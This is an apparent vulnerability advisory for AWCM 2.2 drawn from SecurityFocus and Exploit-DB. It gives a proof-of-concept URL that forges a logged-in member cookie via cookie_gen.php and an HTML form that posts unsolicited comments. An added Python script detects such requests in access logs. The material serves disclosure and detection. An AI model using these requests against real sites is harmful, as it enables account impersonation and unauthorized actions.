Vendor: AWCM
By: SecurityFocus
CVSS: 8.8 (HIGH)
Authentication Bypass and Security Bypass
CWE: 287, 264
Product Name: AWCM
Affected Version From: 2.2
Affected Version To: 2.2
Patch Exists: YES
Related CWE: N/A
CPE: awcm
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2012

AWCM Authentication and Security Bypass Vulnerabilities

Attackers can exploit these vulnerabilities to bypass certain security restrictions and perform unauthorized actions, which may aid in further attacks. The authentication bypass can be exploited by sending a crafted HTTP request to the vulnerable application, while the security bypass can be exploited by sending a crafted HTTP request with a malicious comment parameter.

Mitigation:

Users should apply the patch from the vendor's website.
Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/56465/info

AWCM is prone to an authentication-bypass and multiple security-bypass vulnerabilities.

Attackers can exploit these vulnerabilities to bypass certain security restrictions and perform unauthorized actions, which may aid in further attacks.

AWCM 2.2 is vulnerable; other versions may also be affected. 

Authentication Bypass:

http://www.example.com/awcm/cookie_gen.php?name='key'&content='value'
ex) http://targethost/awcm/cookie_gen.php?name=awcm_member&content=123456

Security Bypass:

[form action="http://www.example.com/awcm/show_video.php?coment=exploit" method="post"]
[input type="hidden" name="coment" value='insert uninvited comments 2' /]
[input type="submit" value="Submit"]
</form>
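
To check whether the authentication-bypass request shape shown above has reached a server, access logs can be searched for calls to cookie_gen.php that carry both a name and a content parameter. The script below is an added example, not part of the original advisory or of AWCM; it assumes Apache combined-format logs, the sample log lines are constructed, and treating awcm_member (the cookie name in the advisory's example) as the login cookie is an assumption.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed sample access-log lines (Apache combined format); not real traffic.
SAMPLE_LOG = """\
203.0.113.5 - - [10/Nov/2012:10:01:02 +0000] "GET /awcm/index.php HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
203.0.113.9 - - [10/Nov/2012:10:02:11 +0000] "GET /awcm/cookie_gen.php?name=awcm_member&content=123456 HTTP/1.1" 200 12 "-" "curl/7.26"
198.51.100.7 - - [10/Nov/2012:10:05:40 +0000] "GET /AWCM/Cookie_Gen.php?content=1&name=theme HTTP/1.1" 200 12 "-" "Mozilla/5.0"
198.51.100.8 - - [10/Nov/2012:10:06:00 +0000] "GET /awcm/cookie_gen.php HTTP/1.1" 200 0 "-" "Mozilla/5.0"
this line is malformed and must be skipped
"""

# client IP, timestamp, method, request target, status code
LINE_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) [^"]*" (\d{3}) ')

# Assumption: cookie names that represent a logged-in session.
AUTH_COOKIES = {"awcm_member"}


def find_cookie_gen_requests(log_text, auth_cookies=AUTH_COOKIES):
    """Return one finding per request that asks cookie_gen.php to set a cookie."""
    findings = []
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue  # not a combined-format line
        ip, ts, method, target, status = m.groups()
        url = urlsplit(target)
        if not url.path.lower().endswith("/cookie_gen.php"):
            continue
        # parse_qs percent-decodes keys and values, so encoded forms match too.
        params = parse_qs(url.query, keep_blank_values=True)
        if "name" not in params or "content" not in params:
            continue  # no caller-supplied cookie name/value pair
        names = params["name"]
        severity = "high" if any(n in auth_cookies for n in names) else "review"
        findings.append({"ip": ip, "time": ts, "method": method,
                         "status": int(status), "cookie": names[-1],
                         "severity": severity})
    return findings


if __name__ == "__main__":
    for f in find_cookie_gen_requests(SAMPLE_LOG):
        print(f["severity"], f["ip"], f["time"], f["cookie"], f["status"])
```

Parameters sent in a POST body do not appear in access logs, so this only covers requests that pass them in the query string, as the advisory's example does.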